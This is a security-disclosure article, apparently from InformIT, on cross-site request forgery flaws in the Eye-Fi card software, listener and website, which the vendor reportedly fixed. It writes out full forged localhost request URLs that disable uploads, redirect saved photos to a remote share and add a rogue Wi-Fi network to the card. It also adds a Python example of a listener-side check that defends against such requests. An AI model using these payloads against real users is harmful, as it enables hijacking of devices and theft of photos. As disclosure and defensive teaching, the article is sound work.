Editor's Note: InformIT.com submitted this article to the Eye-Fi dev team prior to its posting to give them time to address the issues we uncovered. As a result, the Eye-Fi is now a much more secure solution. They have addressed (or will address shortly) all of the issues raised in this article, and have demonstrated their ability and desire to properly secure the Eye-Fi. As with any product, be sure to update your Eye-Fi software to the most recent version prior to usage.
We still feel this article is relevant from a vulnerability testing standpoint, as it demonstrates some of the security issues involved when dealing with technology that pushes the envelope of existing gadgetry. Even though you will no longer be able to exploit the issues we found with the Eye-Fi thanks to their rapid response, we feel you'll still be able to learn from our methodology and findings.
It is important to note, as the Eye-Fi dev team pointed out, some of the following issues are not security risks directly related to the Eye-Fi product. Ultimately it is up to the user to take responsibility for their actions and to use secure operating procedures. Again, the Eye-Fi is a superb product, and their professional and courteous response further proves this point. When it comes to security, it is a company's ability to understand, accept, and respond to software bugs that makes the difference — and we are convinced that the Eye-Fi team "gets" this important issue.
In Part 1 of this series, we took a look at the latest technology that provides a seamless and automated image transfer solution from a digital camera to a waiting PC seconds after the picture is taken. This product, known as the Eye-Fi, combines an SD card that hosts an embedded wireless card with a Web 2.0 web application to create an experience we found fascinating.
In this continuation of the Eye-Fi examination, we are going to look at this solution from the security researcher's perspective. Specifically, we are going to probe the device and its software counterparts for any bugs and/or security vulnerabilities that could be exploited by malicious hackers.
Web 2.0 and the Eye-Fi Versus CSRF
The Eye-Fi solution is—without a doubt—one of the most unique illustrations of Web 2.0 technology we have seen to date. It successfully wraps a complex application that connects to various sources of information to create a single point of administration for the Eye-Fi card, the Eye-Fi software running on the host PC, and the eye.fi web server. While the solution is eye-catching, its cutting-edge programming was found to leave the user exposed to numerous attacks that could be exploited to the detriment of the Eye-Fi owner.
One of the major problems we found is that the listener on the host PC is vulnerable to cross-site request forgery attacks. As a result, it is trivial to send valid commands to the listener from a malicious website or a socially engineered URL click. In addition, thanks to the relationship between the Eye-Fi card and the Eye-Fi Manager, it is not only possible for an attacker to remotely configure the listener, but if the Eye-Fi is plugged into the USB reader, an attacker can also remotely configure the wireless card. Note that an attacker would have to know the MAC address of the card prior to most of these attacks. However, this is trivial to obtain with a sniffer.
The following will outline a few of the CSRF (cross-site request forgery) attacks we discovered against the PC listener:
- Enable/Disable Autostart—The following either enables or disables the auto-start on the Eye-Fi Manager. Note that this request will work on any Eye-Fi user.
http://localhost:59278/WS-Proxy?SOAPAction=urn%3ASetOptions&data=<?xml version='1.0' encoding='utf-8'?><soap%3AEnvelope xmlns%3Asoap='http%3A//schemas.xmlsoap.org/soap/envelope/'><soap%3ABody><SetOptions xmlns='http%3A//localhost/api/soap/eyefilm-ui/v1'><LaunchOnStart>false</LaunchOnStart></SetOptions></soap%3ABody></soap%3AEnvelope>&key=&method=POST&url=/api/soap/eyefilm-ui/v1&dojo.preventCache=1199483783296&id=dojo.io.script.jsonp_dojoIoScript52._jsonpCallback
- Enable/Disable File Upload—The following disables the file upload service. While it is possible to enable the file upload service, any enable request must be done in combination with a call to the SetFolderConfig function, which is also vulnerable to a CSRF attack.
http://localhost:59278/WS-Proxy?SOAPAction=urn%3ASetDesktopSync&data=<?xml version='1.0' encoding='utf-8'?><soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'><soap:Body><SetDesktopSync xmlns='http://localhost/api/soap/eyefilm-ui/v1'><MacAddress>00-14-14-14-14-14</MacAddress><Enable>false</Enable></SetDesktopSync></soap:Body></soap:Envelope>&key=&method=POST&url=%2Fapi%2Fsoap%2Feyefilm-ui%2Fv1&dojo.preventCache=1198255456000&id=dojo.io.script.jsonp_dojoIoScript72._jsonpCallback
- Change Location of File Download—The following URL updates the location where uploaded images are saved. This particular attack needs to be preceded by enabling synchronization using the previously discussed attack, and it will need to be repeated every three minutes for it to remain in effect. When the Eye-Fi Manager performs its polling, the settings.xml file is purged. By repeating the attack, the Eye-Fi Manager re-creates the content in the configuration file. While it is possible to change the destination location to another folder or drive on the victim PC, it is also possible to set the destination to a remote file share using a \\<ip address>\folder value. This is really bad!
http://localhost:59278/WS-Proxy?SOAPAction=urn%3ASetFolderConfig&data=<?xml version='1.0' encoding='utf-8'?><soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'><soap:Body><SetFolderConfig xmlns='http://localhost/api/soap/eyefilm-ui/v1'><MacAddress>00-14-14-14-14-14</MacAddress><PhotoFolder>d:\Documents\My Pictures\Eye-Fi</PhotoFolder><AddDate>true</AddDate><DateType>1</DateType><UploadKey>869b06fcb45713bf406224363c8385b</UploadKey><DownsyncKey>ddcba29c41d5f1eae41b6af7944050bc</DownsyncKey></SetFolderConfig></soap:Body></soap:Envelope>&key=&method=POST&url=%2Fapi%2Fsoap%2Feyefilm-ui%2Fv1&dojo.preventCache=1198255456046&id=dojo.io.script.jsonp_dojoIoScript73._jsonpCallback
The following is another serious CSRF attack, this one against the Eye-Fi card itself: it adds an arbitrary SSID (Service Set Identifier) to the card, so the card can be remotely programmed to connect to networks over which the user has no control. A malicious person can thus insert his own SSID into the camera and essentially hijack the image upload process.
http://localhost:59278/WS-Proxy?SOAPAction=urn%3AAddNetwork&data=<?xml version='1.0' encoding='utf-8'?><soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'><soap:Body><AddNetwork xmlns='http://localhost/api/soap/eyefilm-ui/v1'><MacAddress>00-14-14-14-14-14</MacAddress><SSID>linksys</SSID><AuthType>0</AuthType><Key></Key></AddNetwork></soap:Body></soap:Envelope>&key=&method=POST&url=%2Fapi%2Fsoap%2Feyefilm-ui%2Fv1&dojo.preventCache=1198261961187&id=dojo.io.script.jsonp_dojoIoScript91._jsonpCallback
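As an added example that is not part of this article or of Eye-Fi's own software, the Python below decodes a WS-Proxy request of the kind listed above and applies the check a local listener needs in order to defeat these forgeries: a per-session secret in the empty key= parameter (which a third-party page cannot know) plus an origin check. The allowed origin, the header handling and the sample request are assumptions constructed for the example.

```python
import secrets
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
# Assumption: the origin the legitimate Manager UI is served from.
ALLOWED_ORIGINS = ("http://localhost:59278",)


def parse_ws_proxy(url):
    """Decode a WS-Proxy GET URL into (SOAPAction, operation, params, key)."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    action = q.get("SOAPAction", [""])[0]
    # data= carries the SOAP envelope; its XML declaration names utf-8,
    # so parse it as bytes to keep the declaration and the input consistent.
    root = ET.fromstring(q["data"][0].encode("utf-8"))
    op = root.find("{%s}Body" % SOAP_NS)[0]          # first child of Body
    name = op.tag.rsplit("}", 1)[-1]                  # strip the namespace
    params = {c.tag.rsplit("}", 1)[-1]: (c.text or "") for c in op}
    return action, name, params, q.get("key", [""])[0]


def csrf_verdict(headers, key_param, session_key):
    """Listener-side check: accept only if the request carries the
    per-session secret AND comes from an allowed origin.  Referer is
    consulted because a <script>-tag (JSONP) request sends no Origin."""
    src = headers.get("Origin") or headers.get("Referer") or ""
    if not src.startswith(ALLOWED_ORIGINS):
        return "reject: foreign or missing origin"
    if not key_param or not secrets.compare_digest(key_param, session_key):
        return "reject: missing or wrong session key"
    return "accept"


# Constructed request in the shape the article shows (note the empty key=).
FORGED_URL = (
    "http://localhost:59278/WS-Proxy?SOAPAction=urn%3AAddNetwork&data="
    "<?xml version='1.0' encoding='utf-8'?>"
    "<soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'>"
    "<soap:Body><AddNetwork xmlns='http://localhost/api/soap/eyefilm-ui/v1'>"
    "<MacAddress>00-14-14-14-14-14</MacAddress><SSID>linksys</SSID>"
    "<AuthType>0</AuthType><Key></Key></AddNetwork></soap:Body>"
    "</soap:Envelope>&key=&method=POST&url=%2Fapi%2Fsoap%2Feyefilm-ui%2Fv1"
)

if __name__ == "__main__":
    action, op, params, key = parse_ws_proxy(FORGED_URL)
    print(action, op, params)
    # A forged request from another site, with no key, is refused.
    print(csrf_verdict({"Referer": "http://attacker.example/p"}, key, "s3cret"))
```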
In addition to the issues related to the Eye-Fi card and Manager, the Eye-Fi website is also vulnerable to CSRF attacks. Exploiting these could allow an attacker to configure additional photo sharing services, delete the account from the eye.fi site, or change anything else that is not stored directly on the Eye-Fi card/host PC. For example, the following URL will reset the password of the victim's account. If a user visits a malicious site or clicks on a URL while logged into the Eye-Fi website, their account could be hijacked.